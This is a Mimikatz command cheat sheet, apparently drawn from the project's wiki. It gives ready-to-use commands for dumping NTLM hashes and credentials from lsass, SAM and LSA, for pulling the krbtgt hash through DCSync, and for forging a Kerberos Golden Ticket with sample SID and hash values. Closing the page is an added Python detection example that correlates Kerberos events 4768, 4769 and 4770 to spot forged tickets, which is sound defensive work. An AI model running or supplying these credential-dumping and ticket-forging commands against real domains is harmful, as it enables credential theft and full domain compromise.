Mimikatz requires Admin privileges to function.

privilege::debug
Check privilege: requests the debug privilege (SeDebugPrivilege) for the current session

log <filename>: Logs all commands into a log file

Dumping Hashes

LSA : Local Security Authority
lsass.exe : Local Security Authority Subsystem Service
SAM : Security Accounts Manager

sekurlsa::logonpasswords
Returns the NTLM credentials held in memory by the lsass.exe service
On older versions of Windows, plaintext passwords were returned as well

lsadump::sam
Dump content of SAM database

lsadump::lsa
Dump LSA credentials
If NTLM hashes are not shown use the /patch option

Kerberos Golden Ticket Attack

Generating a Golden Ticket requires access to an account that holds some form of Admin privilege in Active Directory

lsadump::lsa /inject /name:krbtgt
Retrieve the Hash of the krbtgt account from the Domain Controller

lsadump::dcsync /domain:controller.local /user:krbtgt
Fetch the hash of the Kerberos (krbtgt) account using the DCSync feature

kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /id:500
Generate a Golden Ticket and inject it into the current session
/user : Can use any name
/sid : Krbtgt user SID
/krbtgt : NTLM hash
/id : ID of the domain admin account (usually 500)
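A forged TGT is never issued by the domain controller, so the service-ticket requests it produces (Security event 4769) have no matching TGT request (4768) from the same account and client. The following is an added detection example, not code from this page or from the mimikatz project: it correlates constructed 4768/4769/4770 events and flags service-ticket requests with no TGT request or renewal for that account and client within the default 10-hour maximum TGT lifetime. The event records, the lifetime value and the function names are constructed for the example.

```python
from datetime import datetime, timedelta

# Constructed Security-log events (not captured from a real domain controller).
# 4768 = TGT requested, 4769 = service ticket requested, 4770 = ticket renewed.
SAMPLE_EVENTS = [
    {"ts": "2024-01-10 09:00:00", "id": 4768, "account": "alice", "client": "10.0.0.15"},
    {"ts": "2024-01-10 09:30:00", "id": 4769, "account": "alice", "client": "10.0.0.15", "service": "cifs/fs01"},
    # No 4768 from this client for this account anywhere in the log.
    {"ts": "2024-01-10 10:00:00", "id": 4769, "account": "Administrator", "client": "10.0.0.99", "service": "cifs/dc01"},
    # TGT obtained 23 hours earlier and never renewed: beyond the default lifetime.
    {"ts": "2024-01-09 12:00:00", "id": 4768, "account": "bob", "client": "10.0.0.20"},
    {"ts": "2024-01-10 11:00:00", "id": 4769, "account": "bob", "client": "10.0.0.20", "service": "ldap/dc01"},
    # Renewal keeps carol's TGT current, so her request is legitimate.
    {"ts": "2024-01-09 22:00:00", "id": 4768, "account": "carol", "client": "10.0.0.30"},
    {"ts": "2024-01-10 07:00:00", "id": 4770, "account": "carol", "client": "10.0.0.30"},
    {"ts": "2024-01-10 12:00:00", "id": 4769, "account": "carol", "client": "10.0.0.30", "service": "http/web01"},
]

# Default domain Kerberos policy: maximum TGT lifetime of 10 hours (assumed, tune to your policy).
MAX_TGT_LIFETIME = timedelta(hours=10)


def _parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def find_orphan_tgs_requests(events, max_lifetime=MAX_TGT_LIFETIME):
    """Return 4769 events whose (account, client) has no 4768/4770 within max_lifetime before them."""
    ordered = sorted(events, key=lambda e: _parse_ts(e["ts"]))
    last_tgt = {}  # (account, client) -> time the TGT was last issued or renewed
    findings = []
    for ev in ordered:
        key = (ev["account"].lower(), ev["client"])
        when = _parse_ts(ev["ts"])
        if ev["id"] in (4768, 4770):
            last_tgt[key] = when
        elif ev["id"] == 4769:
            issued = last_tgt.get(key)
            if issued is None or when - issued > max_lifetime:
                findings.append({
                    "account": ev["account"],
                    "client": ev["client"],
                    "service": ev.get("service", ""),
                    "ts": ev["ts"],
                    "reason": "no TGT request seen" if issued is None else "TGT older than policy lifetime",
                })
    return findings


if __name__ == "__main__":
    for f in find_orphan_tgs_requests(SAMPLE_EVENTS):
        print(f"ALERT {f['ts']} {f['account']}@{f['client']} -> {f['service']}: {f['reason']}")
```

The rule only holds across a complete log window: a TGT issued before retention starts, or events split across domain controllers that are not centrally collected, produce the same gap, so in practice the correlation is run over events from all DCs with the window set to the domain's actual maximum ticket lifetime.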

Reference: Home · gentilkiwi/mimikatz Wiki · GitHub